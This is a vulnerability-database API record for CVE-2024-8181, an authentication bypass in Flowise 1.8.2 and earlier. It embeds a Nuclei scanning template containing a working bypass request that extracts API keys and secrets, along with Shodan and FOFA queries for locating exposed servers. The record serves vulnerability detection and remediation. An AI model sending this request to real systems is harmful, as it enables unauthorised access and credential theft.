{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-8181/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-8181/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-8181/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-8181/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-8181/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-8181"},"sightings":{"href":"/api/v1/sightings/cve-2024-8181"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.4505,"kev":false,"percentile":0.98728},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-8181.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2024-8181\n\ninfo:\n  name: Flowise <= 1.8.2 Authentication Bypass\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: high\n  description: |\n    An Authentication Bypass vulnerability exists in Flowise version 1.8.2. This could allow a remote, unauthenticated attacker to access API endpoints as an administrator and allow them to access restricted functionality.\n  impact: |\n    Unauthenticated attackers can bypass authentication to access administrative API endpoints, gaining unauthorized access to restricted functionality, API keys, and administrative operations.\n  remediation: |\n    Update Flowise to a version later than 1.8.2 to address the authentication bypass vulnerability.\n  reference:\n    - https://www.tenable.com/security/research/tra-2024-33\n    - https://tenable.com/security/research/tra-2024-22-0\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-8181\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N\n    cvss-score: 7.3\n    cve-id: CVE-2024-8181\n    epss-score: 0.4505\n    epss-percentile: 0.98728\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.favicon.hash:-2051052918\n    fofa-query: title:\"Flowise\"\n  tags: tenable,cve,cve2024,flowise,auth-bypass,vkev,vuln,ai\n\nhttp:\n  - raw:\n      - |\n        GET /api/v1/apikey?/api/v1/ping HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/plain, */*\n        Referer: {{RootURL}}/document-stores\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"apiKey\"\n          - \"apiSecret\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: apiKey\n        part: body\n        internal: false\n        group: 1\n        regex:\n          - '\"apiKey\":\"([^\"]+)\"'\n# digest: 490a004630440220357aad78a695416c8f40e8e65cec5f396c674fffd0b8d58e46ace7160d69b9de022039e3c306cc0f90bccfbca100c7bd03164dc2e1738d8eb9f24be27c02959a4654:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-8181"}